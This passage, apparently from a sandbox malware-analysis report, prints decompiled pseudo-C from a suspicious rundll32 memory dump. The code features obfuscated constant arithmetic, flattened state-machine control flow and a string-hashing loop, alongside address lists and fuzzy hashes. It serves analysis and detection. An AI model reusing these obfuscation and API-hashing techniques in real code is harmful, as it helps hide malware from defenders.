				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				void* _t146;
				void* _t165;
				signed int _t170;
				signed int _t171;
				signed int _t172;
				signed int _t173;
				signed int _t174;
				void* _t177;
				intOrPtr* _t196;
				void* _t197;
				signed int* _t200;

				_push(_a8);
				_t196 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t146);
				_v8 = 0x1587dd;
				_t200 =  &(( &_v72)[4]);
				_t197 = 0;
				_v4 = _v4 & 0;
				_t177 = 0x762b00a;
				_v40 = 0x54d1b5;
				_t170 = 0x79;
				_v40 = _v40 / _t170;
				_v40 = _v40 ^ 0x0000b372;
				_v16 = 0xa1afdd;
				_v16 = _v16 >> 0xd;
				_v16 = _v16 ^ 0x0000050c;
				_v68 = 0x910a11;
				_t171 = 0x13;
				_v68 = _v68 / _t171;
				_v68 = _v68 << 2;
				_v68 = _v68 + 0x13e3;
				_v68 = _v68 ^ 0x00184f98;
				_v32 = 0xaf4665;
				_t172 = 0x26;
				_v32 = _v32 * 0x1c;
				_v32 = _v32 ^ 0x13220c8d;
				_v56 = 0xf39368;
				_v56 = _v56 + 0xf012;
				_v56 = _v56 / _t172;
				_v56 = _v56 ^ 0x000d8e66;
				_v36 = 0xa121b7;
				_v36 = _v36 + 0x3186;
				_v36 = _v36 ^ 0x00aec580;
				_v72 = 0x8bd634;
				_t173 = 0x16;
				_v72 = _v72 / _t173;
				_v72 = _v72 | 0xc3992ef3;
				_v72 = _v72 + 0xf49;
				_v72 = _v72 ^ 0xc3912c07;
				_v24 = 0xbc86c6;
				_v24 = _v24 | 0x4f3bdf6c;
				_v24 = _v24 ^ 0x4fbb36fd;
				_v64 = 0xf11315;
				_v64 = _v64 | 0x791eed70;
				_v64 = _v64 + 0xffff781b;
				_v64 = _v64 | 0xb4748ed7;
				_v64 = _v64 ^ 0xfdf43fb6;
				_v28 = 0xa9ea5e;
				_v28 = _v28 << 9;
				_v28 = _v28 ^ 0x53d38433;
				_v44 = 0xab8ea7;
				_t174 = 0x5e;
				_v44 = _v44 / _t174;
				_v44 = _v44 >> 5;
				_v44 = _v44 ^ 0x00061aeb;
				_v48 = 0xf3254f;
				_v48 = _v48 + 0xffff7d1c;
				_v48 = _v48 ^ 0x338af708;
				_v48 = _v48 ^ 0x337c7814;
				_v60 = 0xe02c97;
				_v60 = _v60 * 0x4f;
				_v60 = _v60 + 0xffffa06e;
				_v60 = _v60 + 0x8165;
				_v60 = _v60 ^ 0x4522059f;
				_v52 = 0x13fe8b;
				_v52 = _v52 >> 6;
				_v52 = _v52 + 0xffffbd6d;
				_v52 = _v52 ^ 0x000eeb0b;
				_v20 = 0x7ee5fd;
				_v20 = _v20 | 0xb1050693;
				_v20 = _v20 ^ 0xb17ba1e4;
				do {
					while(_t177 != 0x29b5a10) {
						if(_t177 == 0x761c4cc) {
							_push(_t177);
							_t165 = E0033AE64(_v68, _t177, _a4, 0, _v56, _t177, _v36,  &_v12, _v40, _v72);
							_t200 =  &(_t200[0xa]);
							if(_t165 != 0) {
								_t177 = 0x29b5a10;
								continue;
							}
						} else {
							if(_t177 == 0x762b00a) {
								_t177 = 0x761c4cc;
								continue;
							} else {
								if(_t177 != 0x7f1be9f) {
									goto L13;
								} else {
									_push(_t177);
									E0033AE64(_v44, _t177, _a4, _t197, _v60, _t177, _v52,  &_v12, _v16, _v20);
									 *_t196 = _v12;
								}
							}
						}
						L6:
						return _t197;
					}
					_push(_t177);
					_push(_t177);
					_t197 = E00337FF2(_v12);
					if(_t197 == 0) {
						_t177 = 0xc410c1b;
						goto L13;
					} else {
						_t177 = 0x7f1be9f;
						continue;
					}
					goto L6;
					L13:
				} while (_t177 != 0xc410c1b);
				goto L6;
			}
































                                                                                                                    0x0033434d
                                                                                                                    0x00334351
                                                                                                                    0x00334353
                                                                                                                    0x00334357
                                                                                                                    0x00334358
                                                                                                                    0x00334359
                                                                                                                    0x0033435e
                                                                                                                    0x00334366
                                                                                                                    0x0033436b
                                                                                                                    0x0033436d
                                                                                                                    0x00334371
                                                                                                                    0x00334376
                                                                                                                    0x00334384
                                                                                                                    0x00334389
                                                                                                                    0x0033438f
                                                                                                                    0x00334397
                                                                                                                    0x0033439f
                                                                                                                    0x003343a4
                                                                                                                    0x003343ac
                                                                                                                    0x003343b8
                                                                                                                    0x003343bd
                                                                                                                    0x003343c3
                                                                                                                    0x003343c8
                                                                                                                    0x003343d0
                                                                                                                    0x003343d8
                                                                                                                    0x003343e5
                                                                                                                    0x003343e8
                                                                                                                    0x003343ec
                                                                                                                    0x003343f4
                                                                                                                    0x003343fc
                                                                                                                    0x0033440c
                                                                                                                    0x00334410
                                                                                                                    0x00334418
                                                                                                                    0x00334420
                                                                                                                    0x00334428
                                                                                                                    0x00334430
                                                                                                                    0x0033443c
                                                                                                                    0x00334441
                                                                                                                    0x00334447
                                                                                                                    0x0033444f
                                                                                                                    0x00334457
                                                                                                                    0x0033445f
                                                                                                                    0x00334467
                                                                                                                    0x0033446f
                                                                                                                    0x00334477
                                                                                                                    0x0033447f
                                                                                                                    0x00334487
                                                                                                                    0x0033448f
                                                                                                                    0x00334497
                                                                                                                    0x0033449f
                                                                                                                    0x003344a7
                                                                                                                    0x003344ac
                                                                                                                    0x003344b4
                                                                                                                    0x003344c0
                                                                                                                    0x003344c3
                                                                                                                    0x003344c7
                                                                                                                    0x003344cc
                                                                                                                    0x003344d9
                                                                                                                    0x003344e6
                                                                                                                    0x003344ee
                                                                                                                    0x003344f6
                                                                                                                    0x003344fe
                                                                                                                    0x0033450b
                                                                                                                    0x0033450f
                                                                                                                    0x00334517
                                                                                                                    0x0033451f
                                                                                                                    0x00334527
                                                                                                                    0x0033452f
                                                                                                                    0x00334534
                                                                                                                    0x0033453c
                                                                                                                    0x00334544
                                                                                                                    0x0033454c
                                                                                                                    0x00334554
                                                                                                                    0x0033455c
                                                                                                                    0x0033455c
                                                                                                                    0x00334566
                                                                                                                    0x003345bd
                                                                                                                    0x003345e3
                                                                                                                    0x003345e8
                                                                                                                    0x003345ed
                                                                                                                    0x003345ef
                                                                                                                    0x00000000
                                                                                                                    0x003345ef
                                                                                                                    0x00334568
                                                                                                                    0x0033456e
                                                                                                                    0x003345b9
                                                                                                                    0x00000000
                                                                                                                    0x00334570
                                                                                                                    0x00334576
                                                                                                                    0x00000000
                                                                                                                    0x0033457c
                                                                                                                    0x0033457c
                                                                                                                    0x003345a1
                                                                                                                    0x003345ad
                                                                                                                    0x003345ad
                                                                                                                    0x00334576
                                                                                                                    0x0033456e
                                                                                                                    0x003345b0
                                                                                                                    0x003345b8
                                                                                                                    0x003345b8
                                                                                                                    0x00334606
                                                                                                                    0x00334607
                                                                                                                    0x0033460d
                                                                                                                    0x00334613
                                                                                                                    0x0033461f
                                                                                                                    0x00000000
                                                                                                                    0x00334615
                                                                                                                    0x00334615
                                                                                                                    0x00000000
                                                                                                                    0x00334615
                                                                                                                    0x00000000
                                                                                                                    0x00334624
                                                                                                                    0x00334624
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                    • Instruction ID: 7f9ef766aebe58adb19d9d918cc796fb907a8d3626d3ccab50509a21b4bae5ea
                                                                                                                    • Opcode Fuzzy Hash: 9cc02864a81945eddb5ef4185070ac249e0cb8defb4cdab54dbc35af79157951
                                                                                                                    • Instruction Fuzzy Hash: 2D7133B2509341AFD359CF21C98982BBBF1EBD9718F10891DF29656260D3B2D949CF83
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034894B Relevance: .1, Instructions: 128COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E0034894B(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t97;
				void* _t111;
				void* _t115;
				void* _t117;
				void* _t135;
				void* _t136;
				signed int _t137;
				signed int _t138;
				signed int _t139;
				signed int _t140;
				void* _t142;
				void* _t143;

				_push(_a16);
				_t115 = __edx;
				_t135 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003420B9(_t97);
				_v64 = 0x51cd23;
				_t143 = _t142 + 0x18;
				_t136 = 0;
				_t117 = 0x1f0121b;
				_t137 = 0x4d;
				_v64 = _v64 / _t137;
				_v64 = _v64 >> 9;
				_v64 = _v64 ^ 0x00032222;
				_v68 = 0xd4b8b7;
				_v68 = _v68 + 0xffffd2af;
				_v68 = _v68 ^ 0xd36e67b3;
				_v68 = _v68 ^ 0xd3b4aa1e;
				_v76 = 0x6efd74;
				_v76 = _v76 << 5;
				_v76 = _v76 ^ 0x2f6bad1f;
				_t138 = 0x34;
				_v76 = _v76 / _t138;
				_v76 = _v76 ^ 0x00af6c6b;
				_v52 = 0x9958c4;
				_v52 = _v52 + 0xffff4241;
				_v52 = _v52 ^ 0x009a50fc;
				_v56 = 0x2e84bf;
				_t139 = 0x72;
				_v56 = _v56 * 0x77;
				_v56 = _v56 ^ 0x15969b56;
				_v80 = 0x2bfbd3;
				_v80 = _v80 | 0xbb654ab5;
				_v80 = _v80 * 0x48;
				_v80 = _v80 >> 8;
				_v80 = _v80 ^ 0x00b72d27;
				_v60 = 0xb8f349;
				_v60 = _v60 / _t139;
				_v60 = _v60 ^ 0xcb885b35;
				_v60 = _v60 ^ 0xcb801a24;
				_v72 = 0xbf562d;
				_t140 = 0x42;
				_v72 = _v72 / _t140;
				_v72 = _v72 ^ 0xd5944d41;
				_v72 = _v72 ^ 0x4a8545c0;
				_v72 = _v72 ^ 0x9f1c34cb;
				_v48 = 0xda7c79;
				_v48 = _v48 << 0xc;
				_v48 = _v48 ^ 0xa7c49699;
				do {
					while(_t117 != 0x1f0121b) {
						if(_t117 == 0x20f75ec) {
							E00333DBC( &_v44, _t115, _v64, _v68, _v76);
							_t143 = _t143 + 0xc;
							_t117 = 0x98c428b;
							continue;
						} else {
							if(_t117 == 0x98c428b) {
								_t111 = E00332A21(_v52, _v56,  &_v44, _t135, _v80);
								_t143 = _t143 + 0xc;
								__eflags = _t111;
								if(__eflags != 0) {
									_t117 = 0xea94eac;
									continue;
								}
							} else {
								_t149 = _t117 - 0xea94eac;
								if(_t117 != 0xea94eac) {
									goto L11;
								} else {
									E0034D97D( &_v44, _v60, _t149, _v72, _t135 + 4, _v48);
									_t136 =  !=  ? 1 : _t136;
								}
							}
						}
						L6:
						return _t136;
					}
					_t117 = 0x20f75ec;
					L11:
					__eflags = _t117 - 0x3544eb3;
				} while (__eflags != 0);
				goto L6;
			}

























                                                                                                                    0x00348952
                                                                                                                    0x00348956
                                                                                                                    0x00348958
                                                                                                                    0x0034895a
                                                                                                                    0x0034895e
                                                                                                                    0x00348962
                                                                                                                    0x00348966
                                                                                                                    0x00348967
                                                                                                                    0x00348968
                                                                                                                    0x0034896d
                                                                                                                    0x00348975
                                                                                                                    0x0034897e
                                                                                                                    0x00348980
                                                                                                                    0x00348987
                                                                                                                    0x0034898c
                                                                                                                    0x00348992
                                                                                                                    0x00348997
                                                                                                                    0x0034899f
                                                                                                                    0x003489a7
                                                                                                                    0x003489af
                                                                                                                    0x003489b7
                                                                                                                    0x003489bf
                                                                                                                    0x003489c7
                                                                                                                    0x003489cc
                                                                                                                    0x003489d8
                                                                                                                    0x003489dd
                                                                                                                    0x003489e3
                                                                                                                    0x003489eb
                                                                                                                    0x003489f3
                                                                                                                    0x003489fb
                                                                                                                    0x00348a03
                                                                                                                    0x00348a10
                                                                                                                    0x00348a13
                                                                                                                    0x00348a17
                                                                                                                    0x00348a1f
                                                                                                                    0x00348a27
                                                                                                                    0x00348a34
                                                                                                                    0x00348a38
                                                                                                                    0x00348a3d
                                                                                                                    0x00348a45
                                                                                                                    0x00348a55
                                                                                                                    0x00348a59
                                                                                                                    0x00348a61
                                                                                                                    0x00348a69
                                                                                                                    0x00348a75
                                                                                                                    0x00348a7d
                                                                                                                    0x00348a81
                                                                                                                    0x00348a89
                                                                                                                    0x00348a91
                                                                                                                    0x00348a99
                                                                                                                    0x00348aa1
                                                                                                                    0x00348aa6
                                                                                                                    0x00348aae
                                                                                                                    0x00348aae
                                                                                                                    0x00348abc
                                                                                                                    0x00348b33
                                                                                                                    0x00348b38
                                                                                                                    0x00348b3b
                                                                                                                    0x00000000
                                                                                                                    0x00348abe
                                                                                                                    0x00348ac4
                                                                                                                    0x00348b0e
                                                                                                                    0x00348b13
                                                                                                                    0x00348b16
                                                                                                                    0x00348b18
                                                                                                                    0x00348b1a
                                                                                                                    0x00000000
                                                                                                                    0x00348b1a
                                                                                                                    0x00348ac6
                                                                                                                    0x00348ac6
                                                                                                                    0x00348acc
                                                                                                                    0x00000000
                                                                                                                    0x00348ace
                                                                                                                    0x00348ae2
                                                                                                                    0x00348aef
                                                                                                                    0x00348aef
                                                                                                                    0x00348acc
                                                                                                                    0x00348ac4
                                                                                                                    0x00348af3
                                                                                                                    0x00348afb
                                                                                                                    0x00348afb
                                                                                                                    0x00348b45
                                                                                                                    0x00348b47
                                                                                                                    0x00348b47
                                                                                                                    0x00348b47
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                    • Instruction ID: a0973635810087a39a2b5a8182b9f8e109242a4d2666fa075204c33765781782
                                                                                                                    • Opcode Fuzzy Hash: 1b994c2edb50fd6b115e90a35cbab81c68b2645124e9f6c859b54d3fe4614af7
                                                                                                                    • Instruction Fuzzy Hash: AA518671508301AFC755CF22C98681FBBE5FBD8708F40892EF6959A220D772DA19CF86
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034AC3A Relevance: .1, Instructions: 89COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 95%
                                                                                                                    			E0034AC3A(void* __ecx) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t82;
				signed int _t85;
				signed int _t86;
				void* _t88;
				void* _t96;
				void* _t97;
				signed int* _t99;

				_t88 = __ecx;
				_t99 =  &_v28;
				_v24 = 0x5aa995;
				_v24 = _v24 | 0x25663b9c;
				_v24 = _v24 << 6;
				_t85 = 0x11;
				_v24 = _v24 / _t85;
				_t96 = 0;
				_v24 = _v24 ^ 0x05a97123;
				_t97 = 0xfe6f9f;
				_v16 = 0x9f09af;
				_v16 = _v16 + 0xcb37;
				_v16 = _v16 ^ 0x3a843722;
				_v16 = _v16 ^ 0x3a14bc19;
				_v28 = 0x7e93e4;
				_v28 = _v28 << 0xa;
				_t86 = 0x1a;
				_v28 = _v28 / _t86;
				_v28 = _v28 ^ 0x4056cd73;
				_v28 = _v28 ^ 0x49f3cf3d;
				_v4 = 0x47c602;
				_v4 = _v4 ^ 0xe3aa640e;
				_v4 = _v4 | 0xd85731ad;
				_v4 = _v4 ^ 0xfbf46e2b;
				_v8 = 0x201e29;
				_v8 = _v8 << 0x10;
				_v8 = _v8 * 0x48;
				_v8 = _v8 ^ 0x7b8200e2;
				_v12 = 0x18f9c1;
				_v12 = _v12 * 0x54;
				_v12 = _v12 << 6;
				_v12 = _v12 ^ 0x0c72dcb8;
				_v20 = 0xd6b502;
				_v20 = _v20 * 0x55;
				_v20 = _v20 << 0xd;
				_v20 = _v20 >> 0xb;
				_v20 = _v20 ^ 0x00034ef9;
				do {
					while(_t97 != 0xfe6f9f) {
						if(_t97 == 0x2f82a60) {
							_push(_t88);
							_push(_t88);
							_t82 = E0033474B();
							_t99 =  &(_t99[2]);
							_t97 = 0x6e030e4;
							_t96 = _t96 + _t82;
							continue;
						} else {
							if(_t97 != 0x6e030e4) {
								goto L8;
							} else {
								_t96 = _t96 + E0034C2F8(_v4, _t88 + 4, _v8, _v12, _v20);
							}
						}
						L5:
						return _t96;
					}
					_t97 = 0x2f82a60;
					L8:
				} while (_t97 != 0xea6061f);
				goto L5;
			}

















                                                                                                                    0x0034ac3a
                                                                                                                    0x0034ac3a
                                                                                                                    0x0034ac3d
                                                                                                                    0x0034ac47
                                                                                                                    0x0034ac4f
                                                                                                                    0x0034ac5e
                                                                                                                    0x0034ac68
                                                                                                                    0x0034ac6c
                                                                                                                    0x0034ac6e
                                                                                                                    0x0034ac76
                                                                                                                    0x0034ac78
                                                                                                                    0x0034ac80
                                                                                                                    0x0034ac88
                                                                                                                    0x0034ac90
                                                                                                                    0x0034ac98
                                                                                                                    0x0034aca0
                                                                                                                    0x0034acab
                                                                                                                    0x0034acb8
                                                                                                                    0x0034acbc
                                                                                                                    0x0034acc4
                                                                                                                    0x0034accc
                                                                                                                    0x0034acd4
                                                                                                                    0x0034acdc
                                                                                                                    0x0034ace4
                                                                                                                    0x0034acec
                                                                                                                    0x0034acf4
                                                                                                                    0x0034acfe
                                                                                                                    0x0034ad02
                                                                                                                    0x0034ad0a
                                                                                                                    0x0034ad17
                                                                                                                    0x0034ad1b
                                                                                                                    0x0034ad20
                                                                                                                    0x0034ad28
                                                                                                                    0x0034ad35
                                                                                                                    0x0034ad39
                                                                                                                    0x0034ad3e
                                                                                                                    0x0034ad43
                                                                                                                    0x0034ad4b
                                                                                                                    0x0034ad4b
                                                                                                                    0x0034ad51
                                                                                                                    0x0034ad8a
                                                                                                                    0x0034ad8b
                                                                                                                    0x0034ad8c
                                                                                                                    0x0034ad91
                                                                                                                    0x0034ad94
                                                                                                                    0x0034ad96
                                                                                                                    0x00000000
                                                                                                                    0x0034ad53
                                                                                                                    0x0034ad55
                                                                                                                    0x00000000
                                                                                                                    0x0034ad57
                                                                                                                    0x0034ad72
                                                                                                                    0x0034ad72
                                                                                                                    0x0034ad55
                                                                                                                    0x0034ad74
                                                                                                                    0x0034ad7d
                                                                                                                    0x0034ad7d
                                                                                                                    0x0034ad9a
                                                                                                                    0x0034ad9c
                                                                                                                    0x0034ad9c
                                                                                                                    0x00000000

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                    • Instruction ID: d3d75e33661755c731395db2a7d2e675c3be2e7d8d9ce1dcb89d1331b9134c26
                                                                                                                    • Opcode Fuzzy Hash: 40cc6cecb1fba03418c52cfe3ac00d0d2a6f5e6b8535ed7c2259ea5577511e05
                                                                                                                    • Instruction Fuzzy Hash: 123175725083018BC315CF25D88940BFBE0FBD8788F118A1DF5A9AB220D3B5DA498B97
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00338969 Relevance: .1, Instructions: 84COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E00338969(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				void* _t84;
				signed int _t99;
				signed int _t103;
				void* _t109;
				signed int _t110;

				_push(_a8);
				_t109 = __edx;
				_push(_a4);
				_push(__edx);
				E003420B9(_t84);
				_v40 = _v40 & 0x00000000;
				_v36 = _v36 & 0x00000000;
				_v44 = 0x779abe;
				_v20 = 0xb5573d;
				_v20 = _v20 ^ 0xbb0d078e;
				_t103 = 0x58;
				_v20 = _v20 * 0x30;
				_v20 = _v20 ^ 0x328c396d;
				_v16 = 0x362481;
				_v16 = _v16 + 0x16cb;
				_v16 = _v16 | 0xfe676eb4;
				_v16 = _v16 ^ 0xfe76a30b;
				_v32 = 0xc91798;
				_v32 = _v32 * 0x65;
				_v32 = _v32 ^ 0x4f59c84a;
				_v28 = 0xb97254;
				_v28 = _v28 / _t103;
				_v28 = _v28 ^ 0x000673a7;
				_v12 = 0xb6c56;
				_v12 = _v12 * 0x2a;
				_v12 = _v12 << 1;
				_v12 = _v12 * 0x5b;
				_v12 = _v12 ^ 0x5515a6e4;
				_v8 = 0x1f2e02;
				_v8 = _v8 * 0x66;
				_v8 = _v8 * 0x79;
				_v8 = _v8 + 0xffff535b;
				_v8 = _v8 ^ 0xdf3e36a5;
				_v24 = 0x692813;
				_v24 = _v24 >> 0xb;
				_v24 = _v24 + 0xffffcb9d;
				_v24 = _v24 ^ 0xfffb0f76;
				E0034D25E(_t103);
				_v16 = 0x87422f;
				_v16 = _v16 | 0xfc58150b;
				_v16 = _v16 ^ 0xfcdf572b;
				_v20 = 0xc6266d;
				_v20 = _v20 << 0xa;
				_v20 = _v20 + 0xffff7638;
				_v20 = _v20 ^ 0x18992a28;
				_t99 = E00340AE0(_v20, _v16);
				_push(_v24);
				_t110 = _t99;
				_push(_t109);
				_push(_t110);
				_push(1);
				E003380E3(_v12, _v8);
				 *((short*)(_t109 + _t110 * 2)) = 0;
				return 0;
			}


















                                                                                                                    0x00338971
                                                                                                                    0x00338974
                                                                                                                    0x00338976
                                                                                                                    0x00338979
                                                                                                                    0x0033897b
                                                                                                                    0x00338980
                                                                                                                    0x00338986
                                                                                                                    0x0033898a
                                                                                                                    0x00338991
                                                                                                                    0x00338998
                                                                                                                    0x003389a5
                                                                                                                    0x003389a6
                                                                                                                    0x003389a9
                                                                                                                    0x003389b0
                                                                                                                    0x003389b7
                                                                                                                    0x003389be
                                                                                                                    0x003389c5
                                                                                                                    0x003389cc
                                                                                                                    0x003389d7
                                                                                                                    0x003389da
                                                                                                                    0x003389e1
                                                                                                                    0x003389ed
                                                                                                                    0x003389f0
                                                                                                                    0x003389f7
                                                                                                                    0x00338a02
                                                                                                                    0x00338a05
                                                                                                                    0x00338a0c
                                                                                                                    0x00338a0f
                                                                                                                    0x00338a16
                                                                                                                    0x00338a21
                                                                                                                    0x00338a28
                                                                                                                    0x00338a2b
                                                                                                                    0x00338a32
                                                                                                                    0x00338a39
                                                                                                                    0x00338a40
                                                                                                                    0x00338a44
                                                                                                                    0x00338a4b
                                                                                                                    0x00338a58
                                                                                                                    0x00338a5d
                                                                                                                    0x00338a64
                                                                                                                    0x00338a6b
                                                                                                                    0x00338a72
                                                                                                                    0x00338a79
                                                                                                                    0x00338a7d
                                                                                                                    0x00338a84
                                                                                                                    0x00338a97
                                                                                                                    0x00338a9c
                                                                                                                    0x00338aa2
                                                                                                                    0x00338aa7
                                                                                                                    0x00338aa8
                                                                                                                    0x00338aa9
                                                                                                                    0x00338aab
                                                                                                                    0x00338ab5
                                                                                                                    0x00338abe

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
                                                                                                                    • Associated: 00000009.00000002.494704127.0000000000330000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000009.00000002.494732587.0000000000353000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_9_2_330000_rundll32.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                    • Instruction ID: 768090e9b12b91ad54b48b7034f04b0be1e5909d737540ea47e295f4fbf40231
                                                                                                                    • Opcode Fuzzy Hash: 731ac0dd4150b2fd44d590bae25ae052b41519021f0b5901ead843c46a23c023
                                                                                                                    • Instruction Fuzzy Hash: 6241CD75C0121AABCF18CFE5C98A9AEBFB0FB44314F108199E525AA260D3B95B45CF90
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0034DBEA Relevance: .1, Instructions: 76COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 88%
                                                                                                                    			E0034DBEA(char* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t74;
				char* _t82;
				signed int _t84;

				_push(_a12);
				_t82 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E003420B9(_t74);
				_v20 = _v20 & 0x00000000;
				_v16 = _v16 & 0x00000000;
				_v28 = 0x71ca23;
				_v24 = 0x57f692;
				_v12 = 0xd3252c;
				_v12 = _v12 + 0x4351;
				_v12 = _v12 + 0xffff5b79;
				_v12 = _v12 ^ 0x00d2c3f6;
				_v8 = 0xbb067e;
				_t84 = 0x11;
				_v8 = _v8 / _t84;
				_v8 = _v8 >> 8;
				_v8 = _v8 ^ 0xac5d3832;
				_v8 = _v8 ^ 0xac5d3334;
				_v8 = 0xab60c2;
				_v8 = _v8 << 0x10;
				_v8 = _v8 ^ 0x910d5570;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x0f1cf547;
				if( *__edx != 0) {
					do {
						_v8 = 0xbb067e;
						_v8 = _v8 / _t84;
						_v8 = _v8 >> 8;
						_v8 = _v8 ^ 0xac5d3832;
						_v8 = _v8 ^ 0xac5d3334;
						_v8 = 0xab60c2;
						_v8 = _v8 << 0x10;
						_v8 = _v8 ^ 0x910d5570;
						_v8 = _v8 >> 4;
						_v8 = _v8 ^ 0x0f1cf547;
						_v12 =  *_t82;
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 + (_v12 << _v8);
						_v12 = _v12 - _v12;
						_t82 = _t82 + 1;
						_t84 = 0x11;
					} while ( *_t82 != 0);
				}
				return _v12;
			}












                                                                                                                    0x0034dbf1
                                                                                                                    0x0034dbf4
                                                                                                                    0x0034dbf6
                                                                                                                    0x0034dbf9
                                                                                                                    0x0034dbfc
                                                                                                                    0x0034dbfe
                                                                                                                    0x0034dc03
                                                                                                                    0x0034dc0a
                                                                                                                    0x0034dc10
                                                                                                                    0x0034dc17
                                                                                                                    0x0034dc1e
                                                                                                                    0x0034dc25
                                                                                                                    0x0034dc2c
                                                                                                                    0x0034dc33
                                                                                                                    0x0034dc3a
                                                                                                                    0x0034dc46
                                                                                                                    0x0034dc49
                                                                                                                    0x0034dc4c
                                                                                                                    0x0034dc50
                                                                                                                    0x0034dc57
                                                                                                                    0x0034dc5e
                                                                                                                    0x0034dc65
                                                                                                                    0x0034dc69
                                                                                                                    0x0034dc70
                                                                                                                    0x0034dc74
                                                                                                                    0x0034dc7e
                                                                                                                    0x0034dc82
                                                                                                                    0x0034dc87
                                                                                                                    0x0034dc95
                                                                                                                    0x0034dc98
                                                                                                                    0x0034dc9c
                                                                                                                    0x0034dca3
                                                                                                                    0x0034dcb0
                                                                                                                    0x0034dcb7
                                                                                                                    0x0034dcbb
                                                                                                                    0x0034dcc2
                                                                                                                    0x0034dcc6
                                                                                                                    0x0034dcd8
                                                                                                                    0x0034dcdb
                                                                                                                    0x0034dce0
                                                                                                                    0x0034dce3
                                                                                                                    0x0034dce6
                                                                                                                    0x0034dce7
                                                                                                                    0x0034dce8
                                                                                                                    0x0034dcee
                                                                                                                    0x0034dcf6

                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000009.00000002.494709664.0000000000331000.00000020.00000800.00020000.00000000.sdmp, Offset: 00330000, based on PE: true
